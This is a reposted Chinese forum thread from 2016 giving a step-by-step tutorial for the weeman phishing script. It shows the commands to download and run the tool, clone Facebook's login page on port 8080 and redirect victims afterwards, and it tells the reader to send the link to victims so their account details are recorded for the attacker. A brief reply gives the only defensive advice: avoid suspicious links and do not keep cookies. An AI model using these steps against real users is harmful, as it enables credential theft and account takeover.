新技术论坛
搜索
查看: 1238|回复: 2
打印 上一主题 下一主题

[技术交流] 【攻防】网页钓鱼之weeman使用

[复制链接]
  • TA的每日心情
    慵懒
    2017-1-5 23:52
  • 签到天数: 183 天

    连续签到: 2 天

    [LV.7]常住居民III

    扫一扫,手机访问本帖
    楼主
    跳转到指定楼层
    发表于 2016-5-27 19:24:23 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    【转载】

    weeman是一个由Python编写的脚本。它可以创建一个钓鱼页面,来窃取用户的信息。下面我们来看看,如何使用该脚本。
    首先,让我们从github上进行下载。
    github clone https://github.com/Hypsurus/weeman

    下载成功后,我们进入该目录。
    cd /root/Desktop/weeman
    并在该目录执行 weeman 。
    ./weeman.py

    下面让我们利用该工具的 show 命令,来查看我们需要做哪些配置。我们以Facebook为例。
    show
    设置我们需要克隆的网址页面。
    set url http://www.facebook.com
    设置监听访问端口。
    set port 8080
    设置当目标的用户名及密码,被成功钓鱼后需要跳转到的页面。我们任让他跳到Facebook的主页。
    set action_url http://www.facebook.com
    执行。
    run

    成功执行后,它会返回一个克隆的页面和链接。只要将链接发送给受害者,当他点击链接并输入账户信息就会被记录,反弹给攻击者。


    下面我模拟受害者点击并输入账户,很快在weeman 的界面获取到了我输入的账户信息。



  • TA的每日心情
    难过
    2016-9-23 17:21
  • 签到天数: 28 天

    连续签到: 1 天

    [LV.4]偶尔看看III

    沙发
    发表于 2016-6-1 15:27:46 | 只看该作者
    到处是窃取信息的脚本文件,以后我上网都不敢动了
  • TA的每日心情
    慵懒
    2017-1-5 23:52
  • 签到天数: 183 天

    连续签到: 2 天

    [LV.7]常住居民III

    板凳
     楼主| 发表于 2016-6-1 21:39:49 | 只看该作者
    zmr123456 发表于 2016-6-1 15:27
    到处是窃取信息的脚本文件,以后我上网都不敢动了

    不保留 cookie  不随便打开 可疑链接  很大程度上可避免!!
    高级模式
    B Color Image Link Quote Code Smilies

    本版积分规则

    手机版|Archiver|开发者俱乐部 ( ICP/ISP证:辽B-2-4-20110106号 IDC证:辽B-1-2-20070003号 )

    GMT+8, 2024-12-23 09:32 , Processed in 0.104963 second(s), 18 queries .

    X+ Open Developer Network (xodn.com)

    © 2009-2017 沈阳讯网网络科技有限公司

    快速回复 返回顶部 返回列表